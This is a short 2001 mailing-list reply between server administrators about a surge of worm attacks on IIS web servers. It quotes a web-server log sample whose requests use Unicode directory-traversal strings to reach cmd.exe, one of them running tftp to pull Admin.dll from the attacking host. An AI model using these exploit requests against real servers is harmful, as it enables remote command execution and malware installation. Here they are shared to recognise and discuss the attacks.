this is the same thing I emailed about earlier
except the attacks I am getting are coming from 216.x.x.x
(also same as me)
I think this is more deliberate since it cannot
be filtered from your routers since you risk
cutting yourself off the internet.
like you I'm getting more than one every second.
like you none yesterday.
>
> Hmm. I've gotten 10,000 of them *today*. Yesterday, none.
>
> They're almost all from 66.12.* addresses (verizon dsl in california, same
> as me). This is where most of my code red attacks are (still) coming
> from, probably because there's a lot of people running IIS who aren't
> really even aware of it.
>
> I'm getting 10-20 hits a second of these attacks...
>
> Is this just a resurgence of that old hack, or something new?
>
> Here's a random sampling from the log file:
> 66.12.144.187 - - [18/Sep/2001:09:19:50 -0700] "GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2066.12.144.187%20GET%20Admin.dll%20c:\Admin.dll
> HTTP/1.0" 200 158 "" ""
> 66.12.193.108 - - [18/Sep/2001:09:19:51 -0700] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 158 "" ""
>66.12.144.187 - - [18/Sep/2001:09:19:51 -0700] "GET
--
Freddie Mendoza
[EMAIL PROTECTED]
Search Engine for Cheap Books
http://satori.com/cheapbooks
